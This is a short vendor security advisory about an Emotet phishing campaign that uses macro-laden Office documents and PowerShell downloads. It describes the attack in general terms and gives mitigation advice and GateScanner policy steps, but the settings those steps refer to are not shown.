Emotet Campaign - Guidance to GateScanner Users
Emotet, one of the most famous and dangerous Trojans, has lately been spotted as a part of a mass phishing campaign. The campaign consists of an email which includes a Microsoft Office doc that when clicked gives an Office 365 error message, generated by an obfuscated macro script. The user is then asked to “Enable Content”.
The enabled macro then launches a PowerShell script which downloads a malicious executable from a web server.
What makes Emotet so dangerous is that it can act like a worm and spread itself using local networks, which makes it extremely hard to clean-up and eradicate from the system.
Emotet has been found to activate a variety of malicious payloads including the Conti, Trickbot, Qbot and Ryuk Ransomware. More details (including technical details) about Emote can be found here.
Mitigation
To minimize the risk of Emotet infection users are advised to follow some basic best practices when it comes to suspicious emails, such as not downloading files or clicking links, and of course not to “enable content” in MS Office docs that were downloaded. On top of that, an update of AV definitions in GateScanner systems will most likely detect these malicious files. Moreover, GateScanner can detect and eliminate the malicious content even when there is no antivirus signature to the file or its malicious content.
To do that you need to set a policy that uses Doc-Reformer conversion engine:
In Convert tab (12) check the following check-boxes:
Then, In Doc tab (5) set the following settings: